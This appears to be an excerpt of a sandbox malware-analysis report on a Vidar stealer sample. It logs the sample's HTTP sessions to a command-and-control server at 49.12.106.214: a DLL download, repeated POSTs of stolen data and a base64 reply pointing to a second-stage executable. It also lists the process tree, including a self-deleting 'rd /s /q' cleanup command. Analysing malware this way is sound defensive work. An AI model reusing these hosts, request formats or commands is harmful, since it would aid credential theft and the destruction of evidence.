Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49775 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 03:00:00 UTC | 194 | OUT | GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.106.214
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-08 03:00:00 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 08 Oct 2024 03:00:00 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Connection: close
Last-Modified: Tuesday, 08-Oct-2024 03:00:00 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                                Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                                                2024-10-08 03:00:00 UTC16384INData Raw: 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01
                                                                                                                Data Ascii: `P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
                                                                                                                2024-10-08 03:00:00 UTC16384INData Raw: 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00
                                                                                                                Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49793 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 03:00:03 UTC | 279 | OUT | POST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----FHIDBKFCAAEBFIDHDBAE
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 1145
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
2024-10-08 03:00:03 UTC | 1145 | OUT | Data Ascii:
------FHIDBKFCAAEBFIDHDBAE
Content-Disposition: form-data; name="token"

c2982176b812cb9215482e1d97c29975
------FHIDBKFCAAEBFIDHDBAE
Content-Disposition: form-data; name="build_id"

2ee1445fc63bc20d0e7966867b13e0e1
------FHIDBKFCAAEBFIDHDBAE
Cont
2024-10-08 03:00:04 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 03:00:03 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
2024-10-08 03:00:04 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49802 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 03:00:04 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----DGIJECGDGCBKECAKFBGC
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 331
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
2024-10-08 03:00:04 UTC | 331 | OUT | Data Ascii:
------DGIJECGDGCBKECAKFBGC
Content-Disposition: form-data; name="token"

c2982176b812cb9215482e1d97c29975
------DGIJECGDGCBKECAKFBGC
Content-Disposition: form-data; name="build_id"

2ee1445fc63bc20d0e7966867b13e0e1
------DGIJECGDGCBKECAKFBGC
Cont
2024-10-08 03:00:05 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 03:00:05 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
2024-10-08 03:00:05 UTC | 2228 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49812 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 03:00:05 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAE
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 331
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
2024-10-08 03:00:05 UTC | 331 | OUT | Data Ascii:
------EBAKKFHJDBKKEBFHDAAE
Content-Disposition: form-data; name="token"

c2982176b812cb9215482e1d97c29975
------EBAKKFHJDBKKEBFHDAAE
Content-Disposition: form-data; name="build_id"

2ee1445fc63bc20d0e7966867b13e0e1
------EBAKKFHJDBKKEBFHDAAE
Cont
2024-10-08 03:00:06 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 03:00:06 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
2024-10-08 03:00:06 UTC | 2288 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49822 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 03:00:07 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----DBKKKEHDHCBFIEBFBGID
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 461
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
2024-10-08 03:00:07 UTC | 461 | OUT | Data Ascii:
------DBKKKEHDHCBFIEBFBGID
Content-Disposition: form-data; name="token"

c2982176b812cb9215482e1d97c29975
------DBKKKEHDHCBFIEBFBGID
Content-Disposition: form-data; name="build_id"

2ee1445fc63bc20d0e7966867b13e0e1
------DBKKKEHDHCBFIEBFBGID
Cont
2024-10-08 03:00:08 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 03:00:08 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
2024-10-08 03:00:08 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49835 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 03:00:09 UTC | 281 | OUT | POST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----AKKFHDAKECFHIDHJDAAA
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 130585
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
2024-10-08 03:00:09 UTC | 16355 | OUT | Data Ascii:
------AKKFHDAKECFHIDHJDAAA
Content-Disposition: form-data; name="token"

c2982176b812cb9215482e1d97c29975
------AKKFHDAKECFHIDHJDAAA
Content-Disposition: form-data; name="build_id"

2ee1445fc63bc20d0e7966867b13e0e1
------AKKFHDAKECFHIDHJDAAA
Cont
                                                                                                                Data Ascii: s8FheywuMrJHbOykeoIGKiijlntJLqG3nlto875o4WZFwMnLAYHFeR/ZdD/n5+R9F/b2K0/c7+p6p/wmvh//AJ/2/wDAeT/4mj/hNfD/APz/ADf+A8n/AMTXlMO65nSCCKWWZ1DpGkbFmUjIIAGSMc59KUq4ufsxikFxuCeSUIfceg24zn2p/wBlUf5/yJfEGJSv7L8xqjCKD2FLTpIporpbWWCeO5bG2F4mV2z0wpGTml8mc3v2L7Ncfa8Z+z+
                                                                                                                2024-10-08 03:00:10 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 03:00:10 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 03:00:10 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 2ok0


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                23 | 192.168.2.4 | 49847 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-10-08 03:00:11 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----AKKFHDAKECFHIDHJDAAA
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 331
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 03:00:11 UTC | 331 | OUT | Data Ascii:
                                                                                                                ------AKKFHDAKECFHIDHJDAAA
                                                                                                                Content-Disposition: form-data; name="token"

                                                                                                                c2982176b812cb9215482e1d97c29975
                                                                                                                ------AKKFHDAKECFHIDHJDAAA
                                                                                                                Content-Disposition: form-data; name="build_id"

                                                                                                                2ee1445fc63bc20d0e7966867b13e0e1
                                                                                                                ------AKKFHDAKECFHIDHJDAAA
                                                                                                                Cont
                                                                                                                2024-10-08 03:00:12 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 03:00:11 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 03:00:12 UTC | 79 | IN | Data Ascii:
                                                                                                                44
                                                                                                                MTI4NTgyMXxodHRwOi8vMTg1LjIxNS4xMTMuMTE3L2luYy9jbGlwLmV4ZXwyfGtra2t8
                                                                                                                0


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                24 | 192.168.2.4 | 49868 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-10-08 03:00:14 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----BFHJJJDAFBKEBGDGHCGD
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 499
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 03:00:14 UTC | 499 | OUT | Data Ascii:
                                                                                                                ------BFHJJJDAFBKEBGDGHCGD
                                                                                                                Content-Disposition: form-data; name="token"

                                                                                                                c2982176b812cb9215482e1d97c29975
                                                                                                                ------BFHJJJDAFBKEBGDGHCGD
                                                                                                                Content-Disposition: form-data; name="build_id"

                                                                                                                2ee1445fc63bc20d0e7966867b13e0e1
                                                                                                                ------BFHJJJDAFBKEBGDGHCGD
                                                                                                                Cont
                                                                                                                2024-10-08 03:00:15 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 03:00:15 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 03:00:15 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 2ok0


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                25 | 192.168.2.4 | 49882 | 49.12.106.214 | 443 | 7648 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-10-08 03:00:16 UTC | 278 | OUT | POST / HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=----KJEGCFBGDHJJJJJKJECF
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Content-Length: 331
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 03:00:16 UTC | 331 | OUT | Data Ascii:
                                                                                                                ------KJEGCFBGDHJJJJJKJECF
                                                                                                                Content-Disposition: form-data; name="token"

                                                                                                                c2982176b812cb9215482e1d97c29975
                                                                                                                ------KJEGCFBGDHJJJJJKJECF
                                                                                                                Content-Disposition: form-data; name="build_id"

                                                                                                                2ee1445fc63bc20d0e7966867b13e0e1
                                                                                                                ------KJEGCFBGDHJJJJJKJECF
                                                                                                                Cont
                                                                                                                2024-10-08 03:00:16 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 03:00:16 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                2024-10-08 03:00:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Target ID:0
                                                                                                                Start time:22:58:57
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Users\user\Desktop\7AeSqNv1rC.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Users\user\Desktop\7AeSqNv1rC.exe"
                                                                                                                Imagebase:0xa60000
                                                                                                                File size:608'256 bytes
                                                                                                                MD5 hash:F275736A38A6B90825076E8D786AD5C5
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:3
                                                                                                                Start time:22:59:14
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                                Imagebase:0x620000
                                                                                                                File size:42'064 bytes
                                                                                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:4
                                                                                                                Start time:22:59:14
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                                Imagebase:0xbb0000
                                                                                                                File size:42'064 bytes
                                                                                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2454873624.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                Target ID:7
                                                                                                                Start time:23:00:13
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\cmd.exe"
                                                                                                                Imagebase:0x240000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:8
                                                                                                                Start time:23:00:13
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:9
                                                                                                                Start time:23:00:13
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\cmd.exe"
                                                                                                                Imagebase:0x240000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:10
                                                                                                                Start time:23:00:13
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\cmd.exe"
                                                                                                                Imagebase:0x240000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:11
                                                                                                                Start time:23:00:13
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:12
                                                                                                                Start time:23:00:13
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\System32\cmd.exe"
                                                                                                                Imagebase:0x240000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:13
                                                                                                                Start time:23:00:13
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:14
                                                                                                                Start time:23:00:17
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exit
                                                                                                                Imagebase:0x240000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:15
                                                                                                                Start time:23:00:17
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:16
                                                                                                                Start time:23:00:17
                                                                                                                Start date:07/10/2024
                                                                                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:timeout /t 10
                                                                                                                Imagebase:0x8b0000
                                                                                                                File size:25'088 bytes
                                                                                                                MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: cfbd656c5331e1c29535b2c88c4a295121db0435e5292100d351f0d7806d4482
                                                                                                                  • Instruction ID: ae21fc2e3b8e4457abe65513bcf490a59cb4f3c229f7c0246e9419c746681bb7
                                                                                                                  • Opcode Fuzzy Hash: cfbd656c5331e1c29535b2c88c4a295121db0435e5292100d351f0d7806d4482
                                                                                                                  • Instruction Fuzzy Hash: D711E312F0EB8A8FF37527B8047A0F87F91EF22610B1A01BAC459861F3ED09691583C9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9974be04ad298efb4e6b0b6a917b01af122352f36017859959eb9dbfa60ad12a
                                                                                                                  • Instruction ID: 14fc9c3a10696baf45a0d6472871f5ee31a48ec5a5cca79daff8876e8e80ee18
                                                                                                                  • Opcode Fuzzy Hash: 9974be04ad298efb4e6b0b6a917b01af122352f36017859959eb9dbfa60ad12a
                                                                                                                  • Instruction Fuzzy Hash: B701491174BA4E0FDB94D76D9CE46243BC1DF59251B8A01B6E949C72B1ED44DD80C3C5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9da04c6c13d39f1505e3e80d9b38d2950950f82a114822a559ada563b0a44346
                                                                                                                  • Instruction ID: 505ad4ae76ee2cabcff83d8a8e43d5ac9fcd6568f3e363edee6a200cd33327fb
                                                                                                                  • Opcode Fuzzy Hash: 9da04c6c13d39f1505e3e80d9b38d2950950f82a114822a559ada563b0a44346
                                                                                                                  • Instruction Fuzzy Hash: D2F02D21B45C2D0FD790E61CA4E8B7537E1FBE8751B4502B5E90DC3265CD14AC4287C0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1911547839.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_7AeSqNv1rC.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 616336e74c180e28c00055e64129956f6213700d8fd72716b70b70d52b8dccc9
                                                                                                                  • Instruction ID: d086edf3df04e018365b57af79aa703013f14f3aadb140b1563c55416065bce0
                                                                                                                  • Opcode Fuzzy Hash: 616336e74c180e28c00055e64129956f6213700d8fd72716b70b70d52b8dccc9
                                                                                                                  • Instruction Fuzzy Hash: 4BF0FC7151E7954FCB56DB78C8AAD907FB0EF1620434901D9D284CB273D629E906CB81
                                                                                                                  Memory Dump Source
